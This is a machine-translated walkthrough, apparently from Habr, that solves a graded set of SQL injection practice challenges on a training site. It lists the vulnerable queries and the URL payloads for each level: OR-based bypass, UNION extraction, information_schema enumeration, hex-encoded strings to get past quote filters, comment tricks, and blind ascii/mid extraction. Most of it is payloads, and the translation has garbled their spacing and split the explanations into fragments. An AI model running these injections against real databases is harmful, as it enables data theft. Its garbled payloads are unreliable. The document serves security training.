Given: Table: users Fields: id, login, pass
select * from users where id = '12 '
https://www.alexbers.com/sql/1.php?text=select+*+from+use+++ID%3D%2712%27
select * from users where id = 2 or login = '$ text'
Table: users Fields: id, login, pass Requirement: Hooray, I know the answer (user password with id = 9):
https://www.alexbers.com/sql/qnbutn2.php?text=-1 'or id =' 9
select * from users where id = 2 or login = '- 1' or id = '9'
id=2
or login=1
or id=9
from the users table, which is taken from the left quote and will be closed by the original request quote. Since user -1
does not exist, we get nothing from this query, but id=9
exists. As a result, we get a conclusion from 2 lines - a user with id=2
and with id=9
.select * from users where id = 2 or login = '$ text' limit 1
Table: users Fields: id, login, pass Requirement: Hooray, I know the answer (user password with id = 13):
https://www.alexbers.com/sql/sdjjy3.php?text=-1 'or id = 13 - 123
select * from users where id = 2 or login = '- 1' or id = 13 - 123 'limit 1
select * from users where id = 2 or login = '$ text' limit 1
Tables: users, secret Fields: id, login, pass - this is in users. The secret table has 3 fields. Requirement: Hooray, I know the answer (given the secret table with the field ggg = abc):
UNION
operator. According to the task, it is required to find the given secret table with the field ggg=abc
. The number of fields in the columns is the same, because the request will look like:https://www.alexbers.com/sql/qjqhweh4.php?text=-1'+union+select+* from secret where ggg = 'abc' + - + 123
select * from users where id = 2 or login = '$ text' limit 1
Tables: users, secret Fields: id, login, pass - this is in users. The secret table has 2 fields. Requirement: Hooray, I know the answer (given by the secret table):
users
table, extract a list of all columns for a secret table. At the moment we do not have the same number of columns, so the union should be used differently.https://www.alexbers.com/sql/sdfkjsdk5.php ? text = 1 'union + select + 1, concat_ws (0x3a, table_name, column_name), 3 + from + information_schema.columns where table_name =' secret '- + 123
https://www.alexbers.com/sql/sdfkjsdk5.php?text=-1 'union select 1, dfgdfgfdg, dfgfddfgdfdfdf from secret-- 123
select * from users where id = $ text limit 1
Tables: users Fields: id, login, pass - this is in users. Quotes are filtered, only 1 line is output from the database. Requirement: Hooray, I know the answer (user password with the nickname god):
mysq_real_escape_string
filter when the value of the id variable is not placed in quotes. Then, even though they are filtered 50 times, we don’t need them, you can use the CHAR()
function for text fields or convert them to hex.https://www.alexbers.com/sql/skldj6.php?text=-1 union select id, login, pass from users where login = 0x676f64
Tables: users Fields: id, login, pass - this is in users. Now, only the first line of the answer is always displayed (the rest are not displayed) Filters characters', ", +, =, comma, space, brackets Requirement: Hooray, I know the answer (user password, with a nickname that contains gentoo):
select * from users where id = $ text limit 1
/**/ /*!*/
, Only one problem remains - the equal sign is filtered. But it can be circumvented using the like
operator. Comparing with the string assumes quotes, so we encode it in hex. Also, we do not know for sure the nickname we are looking for, so we will use the search by mask with the %
sign in the login. The final attack vector will look like:https://www.alexbers.com/sql/dsfhsdjkf7.php?text=-1/*!or/*!login*/like/**/0x2567656e746f6f25
select * from users where id = $ text
Tables: users Fields: id, login, pass - this is in users. Hint: no error messages will appear. Requirement: Hooray, I know the answer (user password, with the nickname fast)
mid()
function, to translate into ascii, the ascii()
function, the attack vector will turn out like this:https://www.alexbers.com/sql/qqqwwweeerrr8.php ? text = -1 or id <= (select ascii (mid (pass, 1,1)) from users where login = 'fast')
Tables: users Fields: id, login, pass - this is in users. Query: select * from users where id = $ text Required: "Hurray, I know the answer (the numerical sum of user logins with 20 <= id <= 30)".
https://www.alexbers.com/sql/almost9.php ? text = -1 or id <= cast ((select sum (login) from users where id between 20 and 30) as signed INTEGER) / 10 https://www.alexbers.com/sql/almost9.php ? text = -1 or id <= MOD (cast ((select sum (login) from users where id between 20 and 30) as signed INTEGER), 10)
Source: https://habr.com/ru/post/253885/
All Articles